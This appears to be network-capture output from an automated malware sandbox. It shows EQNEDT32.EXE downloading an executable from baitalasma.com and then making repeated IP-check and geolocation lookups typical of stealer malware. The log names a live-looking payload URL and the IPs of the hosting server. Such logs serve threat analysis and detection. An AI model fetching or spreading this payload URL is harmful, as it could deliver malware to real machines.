                                              May 4, 2024 10:12:08.295521975 CEST44349167172.67.177.134192.168.2.22
                                              May 4, 2024 10:12:08.295635939 CEST44349167172.67.177.134192.168.2.22
                                              May 4, 2024 10:12:08.295829058 CEST49167443192.168.2.22172.67.177.134
                                              May 4, 2024 10:12:08.334769011 CEST49167443192.168.2.22172.67.177.134
                                              May 4, 2024 10:12:08.387398958 CEST4916580192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:08.557574034 CEST8049165158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:08.557665110 CEST4916580192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:19.737972021 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:19.909044027 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:19.909167051 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:19.909475088 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:20.081522942 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:20.083189011 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:20.097779989 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:20.308232069 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:20.395169973 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:20.572244883 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:20.572292089 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:20.572356939 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:20.574661016 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:20.574677944 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:20.600162029 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:20.902178049 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:20.902307987 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:20.906040907 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:20.906049967 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:20.906331062 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:21.002635002 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:21.044122934 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:21.274130106 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:21.274251938 CEST44349169104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:21.274321079 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:21.294751883 CEST49169443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:23.640651941 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:23.810739040 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:23.832438946 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:23.864722967 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:23.864774942 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:23.864844084 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:23.867995024 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:23.868007898 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:24.094615936 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:24.193567038 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:24.246501923 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:24.246536016 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:24.563359976 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:24.563478947 CEST44349170104.21.67.152192.168.2.22
                                              May 4, 2024 10:12:24.563534975 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:24.564125061 CEST49170443192.168.2.22104.21.67.152
                                              May 4, 2024 10:12:24.579102039 CEST4916880192.168.2.22158.101.44.242
                                              May 4, 2024 10:12:24.755489111 CEST8049168158.101.44.242192.168.2.22
                                              May 4, 2024 10:12:24.755609035 CEST4916880192.168.2.22158.101.44.242
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2024 10:09:28.691240072 CEST5456253192.168.2.228.8.8.8
                                              May 4, 2024 10:09:29.006750107 CEST53545628.8.8.8192.168.2.22
                                              May 4, 2024 10:12:01.741612911 CEST5291753192.168.2.228.8.8.8
                                              May 4, 2024 10:12:01.901099920 CEST53529178.8.8.8192.168.2.22
                                              May 4, 2024 10:12:01.901402950 CEST5291753192.168.2.228.8.8.8
                                              May 4, 2024 10:12:02.060646057 CEST53529178.8.8.8192.168.2.22
                                              May 4, 2024 10:12:02.385366917 CEST6275153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:02.544819117 CEST53627518.8.8.8192.168.2.22
                                              May 4, 2024 10:12:03.422985077 CEST6275153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:03.584394932 CEST53627518.8.8.8192.168.2.22
                                              May 4, 2024 10:12:06.246519089 CEST5789353192.168.2.228.8.8.8
                                              May 4, 2024 10:12:06.409584045 CEST53578938.8.8.8192.168.2.22
                                              May 4, 2024 10:12:08.414736032 CEST5482153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:08.574315071 CEST53548218.8.8.8192.168.2.22
                                              May 4, 2024 10:12:08.574852943 CEST5482153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:08.734234095 CEST53548218.8.8.8192.168.2.22
                                              May 4, 2024 10:12:08.734452009 CEST5482153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:08.893876076 CEST53548218.8.8.8192.168.2.22
                                              May 4, 2024 10:12:08.894104004 CEST5482153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:09.053811073 CEST53548218.8.8.8192.168.2.22
                                              May 4, 2024 10:12:09.054089069 CEST5482153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:09.213597059 CEST53548218.8.8.8192.168.2.22
                                              May 4, 2024 10:12:19.245646000 CEST5471953192.168.2.228.8.8.8
                                              May 4, 2024 10:12:19.405261993 CEST53547198.8.8.8192.168.2.22
                                              May 4, 2024 10:12:19.405617952 CEST5471953192.168.2.228.8.8.8
                                              May 4, 2024 10:12:19.565104961 CEST53547198.8.8.8192.168.2.22
                                              May 4, 2024 10:12:19.574176073 CEST4988153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:19.733669043 CEST53498818.8.8.8192.168.2.22
                                              May 4, 2024 10:12:20.409099102 CEST5499853192.168.2.228.8.8.8
                                              May 4, 2024 10:12:20.571605921 CEST53549988.8.8.8192.168.2.22
                                              May 4, 2024 10:12:24.584345102 CEST5278153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:24.745874882 CEST53527818.8.8.8192.168.2.22
                                              May 4, 2024 10:12:24.746490955 CEST5278153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:24.905953884 CEST53527818.8.8.8192.168.2.22
                                              May 4, 2024 10:12:24.906183004 CEST5278153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:25.065807104 CEST53527818.8.8.8192.168.2.22
                                              May 4, 2024 10:12:25.066088915 CEST5278153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:25.225657940 CEST53527818.8.8.8192.168.2.22
                                              May 4, 2024 10:12:25.226152897 CEST5278153192.168.2.228.8.8.8
                                              May 4, 2024 10:12:25.385550976 CEST53527818.8.8.8192.168.2.22
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 4, 2024 10:09:28.691240072 CEST192.168.2.228.8.8.80xc6afStandard query (0)baitalasma.comA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.741612911 CEST192.168.2.228.8.8.80x337bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901402950 CEST192.168.2.228.8.8.80x337bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.385366917 CEST192.168.2.228.8.8.80x27e0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.422985077 CEST192.168.2.228.8.8.80x27e0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:06.246519089 CEST192.168.2.228.8.8.80x51a2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.414736032 CEST192.168.2.228.8.8.80xfeb2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574852943 CEST192.168.2.228.8.8.80xfeb2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734452009 CEST192.168.2.228.8.8.80xfeb2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.894104004 CEST192.168.2.228.8.8.80xfeb2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.054089069 CEST192.168.2.228.8.8.80xfeb2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.245646000 CEST192.168.2.228.8.8.80xf37bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405617952 CEST192.168.2.228.8.8.80xf37bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.574176073 CEST192.168.2.228.8.8.80x65c4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:20.409099102 CEST192.168.2.228.8.8.80x52ccStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.584345102 CEST192.168.2.228.8.8.80xf5caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.746490955 CEST192.168.2.228.8.8.80xf5caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.906183004 CEST192.168.2.228.8.8.80xf5caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.066088915 CEST192.168.2.228.8.8.80xf5caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.226152897 CEST192.168.2.228.8.8.80xf5caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 4, 2024 10:09:29.006750107 CEST8.8.8.8192.168.2.220xc6afNo error (0)baitalasma.com38.242.255.115A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:01.901099920 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.060646057 CEST8.8.8.8192.168.2.220x337bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:02.544819117 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:03.584394932 CEST8.8.8.8192.168.2.220x27e0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:06.409584045 CEST8.8.8.8192.168.2.220x51a2No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:06.409584045 CEST8.8.8.8192.168.2.220x51a2No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.574315071 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.734234095 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:08.893876076 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.053811073 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:09.213597059 CEST8.8.8.8192.168.2.220xfeb2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.405261993 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.565104961 CEST8.8.8.8192.168.2.220xf37bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:19.733669043 CEST8.8.8.8192.168.2.220x65c4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:20.571605921 CEST8.8.8.8192.168.2.220x52ccNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:20.571605921 CEST8.8.8.8192.168.2.220x52ccNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.745874882 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:24.905953884 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.065807104 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.225657940 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              May 4, 2024 10:12:25.385550976 CEST8.8.8.8192.168.2.220xf5caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              • baitalasma.com
                                              • reallyfreegeoip.org
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916338.242.255.115801924C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              May 4, 2024 10:09:29.331490993 CEST317OUTGET /T76434567000.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: baitalasma.com
                                              Connection: Keep-Alive
                                              May 4, 2024 10:09:29.643255949 CEST369INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Sat, 04 May 2024 08:09:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: keep-alive
                                              Location: https://baitalasma.com/T76434567000.exe
